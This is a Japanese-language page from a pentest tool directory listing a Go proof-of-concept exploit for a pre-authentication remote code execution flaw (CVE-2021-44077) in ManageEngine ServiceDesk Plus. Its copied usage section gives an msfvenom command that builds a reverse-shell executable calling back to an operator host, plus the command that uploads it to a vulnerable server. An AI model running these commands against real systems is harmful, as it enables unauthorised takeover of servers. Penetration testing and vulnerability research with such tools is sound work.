Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Golang-CVE-2021-44077-POC — CVE-2021-44077 向け Golang 製 Proof of Concept Exploit: ManageEngine ServiceDesk Plus (< 11306) における PreAuth RCE | Kitploit
ツール/GitHubGitHub/pizza-power/golang-cve-2021-44077-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubpizza-power/golang-cve-2021-44077-poc

Golang-CVE-2021-44077-POC

CVE-2021-44077 向け Golang 製 Proof of Concept Exploit: ManageEngine ServiceDesk Plus (< 11306) における PreAuth RCE

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
23年前未レビュー

Golang-CVE-2021-44077-POC

このエクスプロイトは、Zoho ManageEngine ServiceDesk Plus < 11306 における認証なしの RCE です。

脆弱性のあるバージョンのソフトウェアはこちら: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe

これの Golang 版が見つからなかったので、ここに置いておきます。私のコードはあまり良くないので、自己責任で使用してください。

ブログ記事:

https://www.pizzapower.me/2022/09/29/golang-proof-of-concept-exploit-for-cve-2021-44077-preauth-rce-in-manageengine-servicedesk-plus-11306/

実行

現在のディレクトリに悪意のあるペイロードを作成します。

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe

次に、エクスプロイトを実行します。

go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"

-u は脆弱な URL です -f は悪意のあるファイルです

ツールをダウンロード